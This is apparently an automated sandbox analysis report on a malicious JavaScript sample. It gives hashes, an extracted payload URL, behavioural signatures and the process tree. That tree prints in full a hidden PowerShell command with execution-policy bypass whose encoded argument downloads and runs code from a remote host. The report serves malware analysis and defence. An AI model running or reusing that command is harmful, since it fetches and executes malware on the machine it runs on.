Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
24/12/2023, 17:40
Static task
static1
Behavioral task
behavioral1
Sample
08ef92112d5fee0b38c8780c5ae31efa.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
08ef92112d5fee0b38c8780c5ae31efa.js
Resource
win10v2004-20231222-en
General
-
Target
08ef92112d5fee0b38c8780c5ae31efa.js
-
Size
104KB
-
MD5
08ef92112d5fee0b38c8780c5ae31efa
-
SHA1
884a50eef33725f5ce274a00f540b72399efec73
-
SHA256
f64ff173de13dab93ddb4b238f0f81baf5d758e84abd12e90b2e57cf1acf78f3
-
SHA512
48dab1b05ee2bff48aee995d33d0d74dc4f3e000c73d02279a9b60a7dcb27245675f5516fc69fd342e39b54acfac0b999b924cf04d6316f31558becd1bf6e7dc
-
SSDEEP
3072:59Ry98guHVBqqg2bcruzUHmLKeMMU7GwbWBPwVGWl9SZ8kV8Gd5bzIvt/4g5eaXt:59Ry9RuXqW4SzUHmLKeMMU7GwWBPwVGq
Malware Config
Extracted
http://smart-integrator.hr/pornhub.php
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2560 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2560 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2560 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1860 wrote to memory of 1980 1860 wscript.exe 28 PID 1860 wrote to memory of 1980 1860 wscript.exe 28 PID 1860 wrote to memory of 1980 1860 wscript.exe 28 PID 1980 wrote to memory of 2560 1980 cmd.exe 30 PID 1980 wrote to memory of 2560 1980 cmd.exe 30 PID 1980 wrote to memory of 2560 1980 cmd.exe 30
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\08ef92112d5fee0b38c8780c5ae31efa.js1⤵
- Suspicious use of WriteProcessMemory
PID:1860 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA2⤵
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcwBtAGEAcgB0AC0AaQBuAHQAZQBnAHIAYQB0AG8AcgAuAGgAcgAvAHAAbwByAG4AaAB1AGIALgBwAGgAcAAiACkA3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-